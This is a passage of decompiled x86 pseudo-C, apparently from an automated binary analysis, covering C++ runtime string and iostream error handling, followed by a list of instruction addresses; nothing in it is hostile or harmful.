																										_t434 = _t362;
																										__eflags = _t327;
																										if(_t327 == 0) {
																											L90:
																											_t363 =  *(_t434 + 0x10);
																											_push(_t471);
																											_t472 = _v28;
																											__eflags =  !_t363 - _t472;
																											if(__eflags <= 0) {
																												_push("string too long");
																												E004136FB(_t327, _t396, __eflags);
																												goto L109;
																											} else {
																												_push(_t396);
																												_t396 = _t363 + _t472;
																												__eflags = _t472;
																												if(_t472 == 0) {
																													L107:
																													return _t434;
																												} else {
																													__eflags = _t396 - 0xfffffffe;
																													if(__eflags > 0) {
																														L109:
																														_push("string too long");
																														E004136FB(_t327, _t396, __eflags);
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														_push(_t327);
																														_t328 = _v52;
																														_push(_t472);
																														_t473 = _v48;
																														_push(_t434);
																														_t190 =  *((intOrPtr*)(_t328 + 0x10));
																														_t435 = _t363;
																														__eflags = _t190 - _t473;
																														if(__eflags < 0) {
																															_push("invalid string position");
																															E0041371B(_t328, _t396, __eflags);
																															goto L135;
																														} else {
																															_t257 = _t190 - _t473;
																															_push(_t396);
																															_t413 = _v44;
																															__eflags = _t413 - _t257;
																															_t396 =  >  ? _t257 : _t413;
																															__eflags = _t435 - _t328;
																															if(_t435 != _t328) {
																																__eflags = _t396 - 0xfffffffe;
																																if(__eflags > 0) {
																																	goto L136;
																																} else {
																																	__eflags =  *((intOrPtr*)(_t435 + 0x14)) - _t396;
																																	if( *((intOrPtr*)(_t435 + 0x14)) >= _t396) {
																																		__eflags = _t396;
																																		if(_t396 != 0) {
																																			goto L119;
																																		} else {
																																			__eflags =  *((intOrPtr*)(_t435 + 0x14)) - 0x10;
																																			 *(_t435 + 0x10) = _t396;
																																			if( *((intOrPtr*)(_t435 + 0x14)) < 0x10) {
																																				_t264 = _t435;
																																				 *_t264 = 0;
																																				return _t264;
																																			} else {
																																				 *( *_t435) = 0;
																																				return _t435;
																																			}
																																		}
																																	} else {
																																		E004077E0(_t363, _t396,  *(_t435 + 0x10));
																																		__eflags = _t396;
																																		if(_t396 == 0) {
																																			L133:
																																			return _t435;
																																		} else {
																																			L119:
																																			__eflags =  *((intOrPtr*)(_t328 + 0x14)) - 0x10;
																																			if( *((intOrPtr*)(_t328 + 0x14)) >= 0x10) {
																																				_t328 =  *_t328;
																																			}
																																			__eflags =  *((intOrPtr*)(_t435 + 0x14)) - 0x10;
																																			if( *((intOrPtr*)(_t435 + 0x14)) < 0x10) {
																																				_t383 = _t435;
																																			} else {
																																				_t383 =  *_t435;
																																			}
																																			__eflags = _t396;
																																			if(_t396 != 0) {
																																				E004170E0(_t383, _t328 + _t473, _t396);
																																			}
																																			__eflags =  *((intOrPtr*)(_t435 + 0x14)) - 0x10;
																																			 *(_t435 + 0x10) = _t396;
																																			if( *((intOrPtr*)(_t435 + 0x14)) < 0x10) {
																																				 *((char*)(_t435 + _t396)) = 0;
																																				goto L133;
																																			} else {
																																				 *((char*)( *_t435 + _t396)) = 0;
																																				return _t435;
																																			}
																																		}
																																	}
																																}
																															} else {
																																_t268 = _t396 + _t473;
																																__eflags =  *(_t435 + 0x10) - _t268;
																																if(__eflags < 0) {
																																	L135:
																																	_push("invalid string position");
																																	E0041371B(_t328, _t396, __eflags);
																																	L136:
																																	_push("string too long");
																																	E004136FB(_t328, _t396, __eflags);
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	_push(_t435);
																																	_push(_t396);
																																	_t397 = _v76;
																																	_t436 = _t363;
																																	__eflags = _t397 - 0xffffffff;
																																	if(__eflags == 0) {
																																		_push("string too long");
																																		E004136FB(_t328, _t397, __eflags);
																																		goto L158;
																																	} else {
																																		__eflags = _t397 - 0xfffffffe;
																																		if(__eflags > 0) {
																																			L158:
																																			_push("string too long");
																																			E004136FB(_t328, _t397, __eflags);
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			asm("int3");
																																			_push(_t328);
																																			_t329 = _v92;
																																			_push(_t436);
																																			_t437 = _t363;
																																			__eflags = _t329;
																																			if(_t329 == 0) {
																																				L171:
																																				_push(_t397);
																																				_t398 = _v88;
																																				__eflags = _t398 - 0xfffffffe;
																																				if(__eflags > 0) {
																																					_push("string too long");
																																					E004136FB(_t329, _t398, __eflags);
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					asm("int3");
																																					_push(_t473);
																																					_t474 = _t363;
																																					_push(_t398);
																																					_t197 = _v0;
																																					_t399 =  *_t197;
																																					 *_t197 = _t197;
																																					_t198 = _v0;
																																					 *((intOrPtr*)(_t198 + 4)) = _t198;
																																					_a4 = 0;
																																					__eflags = _t399 - _v0;
																																					if(_t399 == _v0) {
																																						L202:
																																						return _t198;
																																					} else {
																																						_push(_t329);
																																						_push(_t437);
																																						do {
																																							_t113 = _t399 + 0x1c; // 0xffffffff
																																							_t199 =  *_t113;
																																							_t114 = _t399 + 8; // 0x40ba76
																																							_t438 = _t114;
																																							_t330 =  *_t399;
																																							__eflags = _t199 - 0x10;
																																							if(_t199 < 0x10) {
																																								goto L198;
																																							} else {
																																								_t364 =  *_t438;
																																								__eflags = _t199 + 1 - 0x1000;
																																								if(_t199 + 1 < 0x1000) {
																																									L197:
																																									L0041503F(_t364);
																																									_t490 = _t490 + 4;
																																									goto L198;
																																								} else {
																																									__eflags = _t364 & 0x0000001f;
																																									if(__eflags != 0) {
																																										L203:
																																										E0041A825(_t330, _t364, _t395, __eflags);
																																										asm("int3");
																																										asm("int3");
																																										asm("int3");
																																										_t204 = _v124 & 0x00000017;
																																										 *(_t364 + 0xc) = _t204;
																																										_t366 =  *(_t364 + 0x10) & _t204;
																																										__eflags = _t366;
																																										if(_t366 == 0) {
																																											return _t204;
																																										} else {
																																											__eflags = _v120;
																																											if(_v120 != 0) {
																																												E00416C8D(0, 0);
																																												goto L211;
																																											} else {
																																												__eflags = _t366 & 0x00000004;
																																												if((_t366 & 0x00000004) != 0) {
																																													L211:
																																													_t206 = E00402600(_t438);
																																													_push("ios_base::badbit set");
																																													_push(_t206);
																																													E00404A40(_t330,  &_v148, _t399, _t474, 1);
																																													_v160 = 0x4377b4;
																																													E00416C8D( &_v160, 0x447bb0);
																																													goto L212;
																																												} else {
																																													__eflags = _t366 & 0x00000002;
																																													if((_t366 & 0x00000002) != 0) {
																																														L212:
																																														_t210 = E00402600(_t438);
																																														_push("ios_base::failbit set");
																																														_push(_t210);
																																														E00404A40(_t330,  &_v156, _t399, _t474, 1);
																																														_v168 = 0x4377b4;
																																														E00416C8D( &_v168, 0x447bb0);
																																													} else {
																																													}
																																												}
																																											}
																																											_t214 = E00402600(_t438);
																																											_push("ios_base::eofbit set");
																																											_push(_t214);
																																											_t369 =  &_v164;
																																											E00404A40(_t330, _t369, _t399, _t474, 1);
																																											_v176 = 0x4377b4;
																																											E00416C8D( &_v176, 0x447bb0);
																																											asm("int3");
																																											asm("int3");
																																											asm("int3");
																																											_push(_t438);
																																											_t440 = _t369;
																																											_push(_t399);
																																											__eflags =  *(_t440 + 0x4c);
																																											if( *(_t440 + 0x4c) != 0) {
																																												_t218 = E00409250(_t369, _t399, _t440, _t474);
																																												_push( *(_t440 + 0x4c));
																																												__eflags = _t218;
																																												_t402 =  ==  ? 0 : _t440;
																																												__eflags = E0041B702(0, _t218);
																																												_t403 =  !=  ? 0 :  ==  ? 0 : _t440;
																																												__eflags = _t403;
																																											} else {
																																												_t403 = 0;
																																											}
																																											 *((char*)(_t440 + 0x48)) = 0;
																																											 *(_t440 + 0xc) = _t440 + 4;
																																											_t372 = _t440 + 8;
																																											 *(_t440 + 0x10) = _t372;
																																											 *(_t440 + 0x1c) = _t440 + 0x14;
																																											 *(_t440 + 0x20) = _t440 + 0x18;
																																											 *(_t440 + 0x2c) = _t440 + 0x24;
																																											 *(_t440 + 0x30) = _t440 + 0x28;
																																											 *((char*)(_t440 + 0x3d)) = 0;
																																											 *_t372 = 0;
																																											 *( *(_t440 + 0x20)) = 0;
																																											 *( *(_t440 + 0x30)) = 0;
																																											 *( *(_t440 + 0xc)) = 0;
																																											 *( *(_t440 + 0x1c)) = 0;
																																											 *( *(_t440 + 0x2c)) = 0;
																																											 *(_t440 + 0x4c) = 0;
																																											_t375 =  *0x44c7ec; // 0x0
																																											 *((intOrPtr*)(_t440 + 0x40)) = _t375;
																																											_t376 =  *0x44c7f0; // 0x0
																																											 *((intOrPtr*)(_t440 + 0x44)) = _t376;
																																											 *(_t440 + 0x38) = 0;
																																											return _t403;
																																										}
																																									} else {
																																										_t229 =  *(_t364 - 4);
																																										__eflags = _t229 - _t364;
																																										if(__eflags >= 0) {
																																											goto L203;
																																										} else {
																																											_t364 = _t364 - _t229;
																																											__eflags = _t364 - 4;
																																											if(__eflags < 0) {
																																												goto L203;
																																											} else {
																																												__eflags = _t364 - 0x23;
																																												if(__eflags > 0) {
																																													goto L203;
																																												} else {
																																													_t364 = _t229;
																																													goto L197;
																																												}
																																											}
																																										}
																																									}
																																								}
																																							}
																																							goto L218;
																																							L198:
																																							_t438[0x14] = 0xf;
																																							__eflags = _t438[0x14] - 0x10;
																																							_t438[0x10] = 0;
																																							if(_t438[0x14] >= 0x10) {
																																								_t438 =  *_t438;
																																							}
																																							 *_t438 = 0;
																																							_t198 = L0041503F(_t399);
																																							_t490 = _t490 + 4;
																																							_t399 = _t330;
																																							__eflags = _t330 - _v0;
																																						} while (_t330 != _v0);
																																						goto L202;
																																					}
																																				} else {
																																					__eflags =  *(_t437 + 0x14) - _t398;
																																					if( *(_t437 + 0x14) >= _t398) {
																																						__eflags = _t398;
																																						if(_t398 != 0) {
																																							goto L174;
																																						} else {
																																							__eflags =  *(_t437 + 0x14) - 0x10;
																																							 *(_t437 + 0x10) = _t398;
																																							if( *(_t437 + 0x14) < 0x10) {
																																								_t236 = _t437;
																																								 *_t236 = 0;
																																								return _t236;
																																							} else {
																																								 *( *_t437) = 0;
																																								return _t437;
																																							}
																																						}
																																					} else {
																																						E004077E0(_t437, _t398,  *(_t437 + 0x10));
																																						__eflags = _t398;
																																						if(_t398 == 0) {
																																							L186:
																																							return _t437;
																																						} else {
																																							L174:
																																							__eflags =  *(_t437 + 0x14) - 0x10;
																																							if( *(_t437 + 0x14) < 0x10) {
																																								_t230 = _t437;
																																							} else {
																																								_t230 =  *_t437;
																																							}
																																							__eflags = _t398;
																																							if(_t398 != 0) {
																																								E004170E0(_t230, _t329, _t398);
																																							}
																																							__eflags =  *(_t437 + 0x14) - 0x10;
																																							 *(_t437 + 0x10) = _t398;
																																							if( *(_t437 + 0x14) < 0x10) {
																																								 *((char*)(_t437 + _t398)) = 0;
																																								goto L186;
																																							} else {
																																								 *((char*)( *_t437 + _t398)) = 0;
																																								return _t437;
																																							}
																																						}
																																					}
																																				}
																																			} else {
																																				_t363 =  *(_t437 + 0x14);
																																				__eflags = _t363 - 0x10;
																																				if(_t363 < 0x10) {
																																					_t240 = _t437;
																																				} else {
																																					_t240 =  *_t437;
																																				}
																																				__eflags = _t329 - _t240;
																																				if(_t329 < _t240) {
																																					goto L171;
																																				} else {
																																					__eflags = _t363 - 0x10;
																																					if(_t363 < 0x10) {
																																						_t395 = _t437;
																																					} else {
																																						_t395 =  *_t437;
																																					}
																																					__eflags =  *(_t437 + 0x10) + _t395 - _t329;
																																					if( *(_t437 + 0x10) + _t395 <= _t329) {
																																						goto L171;
																																					} else {
																																						__eflags = _t363 - 0x10;
																																						if(_t363 < 0x10) {
																																							_push(_v88);
																																							_t243 = _t437;
																																							_t336 = _t329 - _t243;
																																							__eflags = _t336;
																																							_push(_t336);
																																							_push(_t437);
																																							L110();
																																							return _t243;
																																						} else {
																																							_push(_v88);
																																							_t244 =  *_t437;
																																							_t338 = _t329 - _t244;
																																							__eflags = _t338;
																																							_push(_t338);
																																							_push(_t437);
																																							L110();
																																							return _t244;
																																						}
																																					}
																																				}
																																			}
																																		} else {
																																			__eflags =  *((intOrPtr*)(_t436 + 0x14)) - _t397;
																																			if( *((intOrPtr*)(_t436 + 0x14)) >= _t397) {
																																				__eflags = _t397;
																																				if(_t397 != 0) {
																																					goto L141;
																																				} else {
																																					__eflags =  *((intOrPtr*)(_t436 + 0x14)) - 0x10;
																																					 *(_t436 + 0x10) = _t397;
																																					if( *((intOrPtr*)(_t436 + 0x14)) < 0x10) {
																																						_t253 = _t436;
																																						 *_t253 = 0;
																																						return _t253;
																																					} else {
																																						 *( *_t436) = 0;
																																						return _t436;
																																					}
																																				}
																																			} else {
																																				E004077E0(_t363, _t397,  *(_t436 + 0x10));
																																				__eflags = _t397;
																																				if(_t397 == 0) {
																																					L156:
																																					return _t436;
																																				} else {
																																					L141:
																																					__eflags = _t397 - 1;
																																					if(_t397 != 1) {
																																						__eflags =  *((intOrPtr*)(_t436 + 0x14)) - 0x10;
																																						if( *((intOrPtr*)(_t436 + 0x14)) < 0x10) {
																																							_t380 = _t436;
																																						} else {
																																							_t380 =  *_t436;
																																						}
																																						E00417660(_t397, _t380, _v72, _t397);
																																					} else {
																																						__eflags =  *((intOrPtr*)(_t436 + 0x14)) - 0x10;
																																						if( *((intOrPtr*)(_t436 + 0x14)) < 0x10) {
																																							 *_t436 = _v72;
																																						} else {
																																							 *( *_t436) = _v72;
																																						}
																																					}
																																					__eflags =  *((intOrPtr*)(_t436 + 0x14)) - 0x10;
																																					 *(_t436 + 0x10) = _t397;
																																					if( *((intOrPtr*)(_t436 + 0x14)) < 0x10) {
																																						 *((char*)(_t436 + _t397)) = 0;
																																						goto L156;
																																					} else {
																																						 *((char*)( *_t436 + _t397)) = 0;
																																						return _t436;
																																					}
																																				}
																																			}
																																		}
																																	}
																																} else {
																																	 *(_t435 + 0x10) = _t268;
																																	__eflags =  *((intOrPtr*)(_t435 + 0x14)) - 0x10;
																																	if( *((intOrPtr*)(_t435 + 0x14)) >= 0x10) {
																																		_t363 =  *_t435;
																																	}
																																	 *((char*)(_t363 + _t268)) = 0;
																																	E0040DFD0(_t328, _t435, _t473, 0, _t473);
																																	return _t435;
																																}
																															}
																														}
																													} else {
																														__eflags =  *((intOrPtr*)(_t434 + 0x14)) - _t396;
																														if( *((intOrPtr*)(_t434 + 0x14)) >= _t396) {
																															__eflags = _t396;
																															if(_t396 != 0) {
																																goto L95;
																															} else {
																																 *(_t434 + 0x10) = _t396;
																																__eflags =  *((intOrPtr*)(_t434 + 0x14)) - 0x10;
																																if( *((intOrPtr*)(_t434 + 0x14)) < 0x10) {
																																	_t278 = _t434;
																																	 *_t278 = 0;
																																	return _t278;
																																} else {
																																	 *( *_t434) = 0;
																																	return _t434;
																																}
																															}
																														} else {
																															E004077E0(_t434, _t396, _t363);
																															__eflags = _t396;
																															if(_t396 == 0) {
																																goto L107;
																															} else {
																																L95:
																																__eflags =  *((intOrPtr*)(_t434 + 0x14)) - 0x10;
																																if( *((intOrPtr*)(_t434 + 0x14)) < 0x10) {
																																	_t385 = _t434;
																																} else {
																																	_t385 =  *_t434;
																																}
																																__eflags = _t472;
																																if(_t472 != 0) {
																																	__eflags =  *(_t434 + 0x10) + _t385;
																																	E004170E0( *(_t434 + 0x10) + _t385, _t327, _t472);
																																}
																																__eflags =  *((intOrPtr*)(_t434 + 0x14)) - 0x10;
																																 *(_t434 + 0x10) = _t396;
																																if( *((intOrPtr*)(_t434 + 0x14)) < 0x10) {
																																	 *((char*)(_t434 + _t396)) = 0;
																																	goto L107;
																																} else {
																																	 *((char*)( *_t434 + _t396)) = 0;
																																	return _t434;
																																}
																															}
																														}
																													}
																												}
																											}
																										} else {
																											_t387 =  *((intOrPtr*)(_t434 + 0x14));
																											__eflags = _t387 - 0x10;
																											if(_t387 < 0x10) {
																												_t282 = _t434;
																											} else {
																												_t282 =  *_t434;
																											}
																											__eflags = _t327 - _t282;
																											if(_t327 < _t282) {
																												goto L90;
																											} else {
																												__eflags = _t387 - 0x10;
																												if(_t387 < 0x10) {
																													_t395 = _t434;
																												} else {
																													_t395 =  *_t434;
																												}
																												__eflags =  *(_t434 + 0x10) + _t395 - _t327;
																												if( *(_t434 + 0x10) + _t395 <= _t327) {
																													goto L90;
																												} else {
																													__eflags = _t387 - 0x10;
																													if(_t387 < 0x10) {
																														_push(_v28);
																														_t285 = _t434;
																														_t349 = _t327 - _t285;
																														__eflags = _t349;
																														_push(_t349);
																														_push(_t434);
																														L39();
																														return _t285;
																													} else {
																														_push(_v28);
																														_t286 =  *_t434;
																														_t351 = _t327 - _t286;
																														__eflags = _t351;
																														_push(_t351);
																														_push(_t434);
																														L39();
																														return _t286;
																													}
																												}
																											}
																										}
																									} else {
																										__eflags =  *((intOrPtr*)(_t433 + 0x14)) - _t396;
																										if( *((intOrPtr*)(_t433 + 0x14)) >= _t396) {
																											__eflags = _t396;
																											if(_t396 != 0) {
																												goto L68;
																											} else {
																												 *(_t433 + 0x10) = _t396;
																												__eflags =  *((intOrPtr*)(_t433 + 0x14)) - 0x10;
																												if( *((intOrPtr*)(_t433 + 0x14)) < 0x10) {
																													_t292 = _t433;
																													 *_t292 = 0;
																													return _t292;
																												} else {
																													 *((char*)( *_t433)) = 0;
																													return _t433;
																												}
																											}
																										} else {
																											E004077E0(_t433, _t396, _t362);
																											__eflags = _t396;
																											if(_t396 == 0) {
																												goto L75;
																											} else {
																												L68:
																												E004072A0(_t433,  *(_t433 + 0x10), _t326, _v12);
																												__eflags =  *((intOrPtr*)(_t433 + 0x14)) - 0x10;
																												 *(_t433 + 0x10) = _t396;
																												if( *((intOrPtr*)(_t433 + 0x14)) < 0x10) {
																													 *((char*)(_t433 + _t396)) = 0;
																													goto L75;
																												} else {
																													 *((char*)( *_t433 + _t396)) = 0;
																													return _t433;
																												}
																											}
																										}
																									}
																								}
																							}
																						} else {
																							__eflags =  *((intOrPtr*)(_t432 + 0x14)) - _t396;
																							if( *((intOrPtr*)(_t432 + 0x14)) >= _t396) {
																								__eflags = _t396;
																								if(_t396 != 0) {
																									goto L45;
																								} else {
																									 *(_t432 + 0x10) = _t396;
																									__eflags =  *((intOrPtr*)(_t432 + 0x14)) - 0x10;
																									if( *((intOrPtr*)(_t432 + 0x14)) < 0x10) {
																										_t307 = _t432;
																										 *_t307 = 0;
																										return _t307;
																									} else {
																										 *( *_t432) = 0;
																										return _t432;
																									}
																								}
																							} else {
																								E004077E0(_t432, _t396, _t361);
																								_t395 = _v0;
																								__eflags = _t396;
																								if(_t396 == 0) {
																									goto L59;
																								} else {
																									L45:
																									__eflags =  *((intOrPtr*)(_t325 + 0x14)) - 0x10;
																									if( *((intOrPtr*)(_t325 + 0x14)) >= 0x10) {
																										_t325 =  *_t325;
																									}
																									__eflags =  *((intOrPtr*)(_t432 + 0x14)) - 0x10;
																									if( *((intOrPtr*)(_t432 + 0x14)) < 0x10) {
																										_t392 = _t432;
																									} else {
																										_t392 =  *_t432;
																									}
																									__eflags = _t471;
																									if(_t471 != 0) {
																										__eflags =  *(_t432 + 0x10) + _t392;
																										E004170E0( *(_t432 + 0x10) + _t392, _t325 + _t395, _t471);
																									}
																									__eflags =  *((intOrPtr*)(_t432 + 0x14)) - 0x10;
																									 *(_t432 + 0x10) = _t396;
																									if( *((intOrPtr*)(_t432 + 0x14)) < 0x10) {
																										 *((char*)(_t432 + _t396)) = 0;
																										goto L59;
																									} else {
																										 *((char*)( *_t432 + _t396)) = 0;
																										return _t432;
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		} else {
																			_t13 = _t361 + 0x23; // 0x23
																			_t315 = _t13 & 0xffffffe0;
																			__eflags = _t315;
																			 *(_t315 - 4) = _t361;
																			return _t315;
																		}
																	}
																}
															}
														} else {
															L27:
															return _t173;
														}
													} else {
														_t7 = _t361 + 0x23; // 0x23
														_t319 = _t7 & 0xffffffe0;
														__eflags = _t319;
														 *(_t319 - 4) = _t361;
														return _t319;
													}
												}
											}
										}
									} else {
										L14:
										return _t168;
									}
								} else {
									_t3 = _t361 + 0x23; // 0x23
									_t323 = _t3 & 0xffffffe0;
									__eflags = _t323;
									 *(_t323 - 4) = _t361;
									return _t323;
								}
							}
						}
					}
				} else {
					L1:
					return _t163;
				}
				L218:
			}

0x0040c790
0x0040c790
0x0040c790
0x0040c790
0x0040c796
0x0040c79b
0x0040c7a0
0x0040c7dd
0x00000000
0x0040c7a2
0x0040c7a2
0x0040c7a5
0x0040c7aa
0x0040c7cf
0x0040c7d4
0x0040c7d7
0x0040c7d9
0x00000000
0x0040c7db
0x00000000
0x0040c7db
0x0040c7ac
0x0040c7ac
0x0040c7af
0x0040c7b1
0x0040c7e2
0x0040c7e2
0x00000000
0x0040c7b3
0x0040c7b9
0x0040c7bb
0x0040c7be
0x0040c7c0
0x0040c7e7
0x0040c7e7
0x0040c7ec
0x0040c7ec
0x0040c7f1
0x0040c7f2
0x0040c7f3
0x0040c7f4
0x0040c7f5
0x0040c7f6
0x0040c7f7
0x0040c7f8
0x0040c7f9
0x0040c7fa
0x0040c7fb
0x0040c7fc
0x0040c7fd
0x0040c7fe
0x0040c7ff
0x0040c800
0x0040c804
0x0040c806
0x0040c80b
0x0040c810
0x0040c84d
0x00000000
0x0040c812
0x0040c812
0x0040c815
0x0040c81a
0x0040c83f
0x0040c844
0x0040c847
0x0040c849
0x00000000
0x0040c84b
0x00000000
0x0040c84b
0x0040c81c
0x0040c81c
0x0040c81f
0x0040c821
0x0040c852
0x0040c852
0x00000000
0x0040c823
0x0040c824
0x0040c829
0x0040c82b
0x0040c82e
0x0040c830
0x0040c857
0x0040c857
0x0040c85c
0x0040c85c
0x0040c861
0x0040c862
0x0040c863
0x0040c864
0x0040c865
0x0040c866
0x0040c867
0x0040c868
0x0040c869
0x0040c86a
0x0040c86b
0x0040c86c
0x0040c86d
0x0040c86e
0x0040c86f
0x0040c870
0x0040c874
0x0040c876
0x0040c87b
0x0040c880
0x0040c8c0
0x00000000
0x0040c882
0x0040c885
0x0040c888
0x0040c88d
0x0040c8b2
0x0040c8b7
0x0040c8ba
0x0040c8bc
0x00000000
0x0040c8be
0x00000000
0x0040c8be
0x0040c88f
0x0040c88f
0x0040c892
0x0040c894
0x0040c8c5
0x0040c8c5
0x00000000
0x0040c896
0x0040c89c
0x0040c89e
0x0040c8a1
0x0040c8a3
0x0040c8ca
0x0040c8ca
0x0040c8cf
0x0040c8cf
0x0040c8d4
0x0040c8d5
0x0040c8d6
0x0040c8d7
0x0040c8d8
0x0040c8d9
0x0040c8da
0x0040c8db
0x0040c8dc
0x0040c8dd
0x0040c8de
0x0040c8df
0x0040c8e0
0x0040c8e4
0x0040c8e5
0x0040c8ea
0x0040c8ec
0x0040c8ef
0x0040c8f1
0x0040c9b6
0x0040c9bb
0x00000000
0x0040c8f7
0x0040c8f7
0x0040c8fa
0x0040c8fc
0x0040c8fd
0x0040c901
0x0040c903
0x0040c90a
0x0040c90c
0x0040c9c0
0x0040c9c0
0x0040c9c5
0x00000000
0x0040c912
0x0040c912
0x0040c913
0x0040c916
0x0040c918
0x0040c9ad
0x0040c9b3
0x0040c91e
0x0040c91e
0x0040c921
0x0040c9ca
0x0040c9ca
0x0040c9cf
0x0040c9d4
0x0040c9d5
0x0040c9d6
0x0040c9d7
0x0040c9d8
0x0040c9d9
0x0040c9da
0x0040c9db
0x0040c9dc
0x0040c9dd
0x0040c9de
0x0040c9df
0x0040c9e0
0x0040c9e1
0x0040c9e5
0x0040c9e6
0x0040c9e8
0x0040c9ef
0x0040c9f1
0x0040ca6b
0x0040ca70
0x00000000
0x0040c9f3
0x0040c9f3
0x0040c9f4
0x0040c9f7
0x0040c9f9
0x0040ca63
0x0040ca68
0x0040c9fb
0x0040c9fb
0x0040c9fe
0x0040ca75
0x0040ca75
0x0040ca7a
0x0040ca7f
0x0040ca80
0x0040ca81
0x0040ca85
0x0040ca86
0x0040ca88
0x0040ca8a
0x0040cae3
0x0040cae3
0x0040cae8
0x0040cae9
0x0040caef
0x0040caf1
0x0040cb8c
0x0040cb91
0x00000000
0x0040caf7
0x0040caf7
0x0040caf8
0x0040cafb
0x0040cafd
0x0040cb83
0x0040cb89
0x0040cb03
0x0040cb03
0x0040cb06
0x0040cb96
0x0040cb96
0x0040cb9b
0x0040cba0
0x0040cba1
0x0040cba2
0x0040cba3
0x0040cba4
0x0040cba5
0x0040cba6
0x0040cba7
0x0040cba8
0x0040cba9
0x0040cbaa
0x0040cbab
0x0040cbac
0x0040cbad
0x0040cbae
0x0040cbaf
0x0040cbb0
0x0040cbb1
0x0040cbb5
0x0040cbb6
0x0040cbba
0x0040cbbb
0x0040cbbe
0x0040cbc0
0x0040cbc2
0x0040cc95
0x0040cc9a
0x00000000
0x0040cbc8
0x0040cbc8
0x0040cbca
0x0040cbcb
0x0040cbcf
0x0040cbd1
0x0040cbd4
0x0040cbd6
0x0040cc06
0x0040cc09
0x00000000
0x0040cc0f
0x0040cc0f
0x0040cc12
0x0040cc33
0x0040cc35
0x00000000
0x0040cc37
0x0040cc37
0x0040cc3b
0x0040cc3e
0x0040cc4f
0x0040cc54
0x0040cc57
0x0040cc40
0x0040cc43
0x0040cc4b
0x0040cc4b
0x0040cc3e
0x0040cc14
0x0040cc18
0x0040cc1d
0x0040cc1f
0x0040cc8c
0x0040cc92
0x0040cc21
0x0040cc21
0x0040cc21
0x0040cc25
0x0040cc27
0x0040cc27
0x0040cc29
0x0040cc2d
0x0040cc5a
0x0040cc2f
0x0040cc2f
0x0040cc2f
0x0040cc5c
0x0040cc5e
0x0040cc66
0x0040cc6b
0x0040cc6e
0x0040cc72
0x0040cc75
0x0040cc88
0x00000000
0x0040cc77
0x0040cc79
0x0040cc83
0x0040cc83
0x0040cc75
0x0040cc1f
0x0040cc12
0x0040cbd8
0x0040cbd8
0x0040cbdb
0x0040cbde
0x0040cc9f
0x0040cc9f
0x0040cca4
0x0040cca9
0x0040cca9
0x0040ccae
0x0040ccb3
0x0040ccb4
0x0040ccb5
0x0040ccb6
0x0040ccb7
0x0040ccb8
0x0040ccb9
0x0040ccba
0x0040ccbb
0x0040ccbc
0x0040ccbd
0x0040ccbe
0x0040ccbf
0x0040ccc0
0x0040ccc1
0x0040ccc2
0x0040ccc6
0x0040ccc8
0x0040cccb
0x0040cd6d
0x0040cd72
0x00000000
0x0040ccd1
0x0040ccd1
0x0040ccd4
0x0040cd77
0x0040cd77
0x0040cd7c
0x0040cd81
0x0040cd82
0x0040cd83
0x0040cd84
0x0040cd85
0x0040cd86
0x0040cd87
0x0040cd88
0x0040cd89
0x0040cd8a
0x0040cd8b
0x0040cd8c
0x0040cd8d
0x0040cd8e
0x0040cd8f
0x0040cd90
0x0040cd91
0x0040cd95
0x0040cd96
0x0040cd98
0x0040cd9a
0x0040cdf3
0x0040cdf3
0x0040cdf4
0x0040cdf8
0x0040cdfb
0x0040ce76
0x0040ce7b
0x0040ce80
0x0040ce81
0x0040ce82
0x0040ce83
0x0040ce84
0x0040ce85
0x0040ce86
0x0040ce87
0x0040ce88
0x0040ce89
0x0040ce8a
0x0040ce8b
0x0040ce8c
0x0040ce8d
0x0040ce8e
0x0040ce8f
0x0040ce90
0x0040ce91
0x0040ce93
0x0040ce94
0x0040ce97
0x0040ce99
0x0040ce9b
0x0040ce9e
0x0040cea1
0x0040cea8
0x0040ceab
0x0040cf15
0x0040cf17
0x0040cead
0x0040cead
0x0040ceae
0x0040ceb0
0x0040ceb0
0x0040ceb0
0x0040ceb3
0x0040ceb3
0x0040ceb6
0x0040ceb8
0x0040cebb
0x00000000
0x0040cebd
0x0040cebd
0x0040cec0
0x0040cec5
0x0040cee1
0x0040cee2
0x0040cee7
0x00000000
0x0040cec7
0x0040cec7
0x0040ceca
0x0040cf18
0x0040cf18
0x0040cf1d
0x0040cf1e
0x0040cf1f
0x0040cf27
0x0040cf2a
0x0040cf30
0x0040cf30
0x0040cf32
0x0040cf4a
0x0040cf34
0x0040cf34
0x0040cf39
0x0040cf51
0x00000000
0x0040cf3b
0x0040cf3b
0x0040cf3e
0x0040cf56
0x0040cf56
0x0040cf5b
0x0040cf60
0x0040cf67
0x0040cf75
0x0040cf7e
0x00000000
0x0040cf40
0x0040cf40
0x0040cf43
0x0040cf83
0x0040cf83
0x0040cf88
0x0040cf8d
0x0040cf94
0x0040cfa2
0x0040cfab
0x00000000
0x0040cf45
0x0040cf43
0x0040cf3e
0x0040cfb0
0x0040cfb5
0x0040cfba
0x0040cfbd
0x0040cfc1
0x0040cfcf
0x0040cfd8
0x0040cfdd
0x0040cfde
0x0040cfdf
0x0040cfe0
0x0040cfe1
0x0040cfe3
0x0040cfe4
0x0040cfe8
0x0040cfee
0x0040cff3
0x0040cffa
0x0040cffc
0x0040d009
0x0040d00b
0x0040d00b
0x0040cfea
0x0040cfea
0x0040cfea
0x0040d011
0x0040d015
0x0040d018
0x0040d01e
0x0040d021
0x0040d027
0x0040d02d
0x0040d033
0x0040d036
0x0040d03a
0x0040d043
0x0040d04c
0x0040d055
0x0040d061
0x0040d06a
0x0040d070
0x0040d077
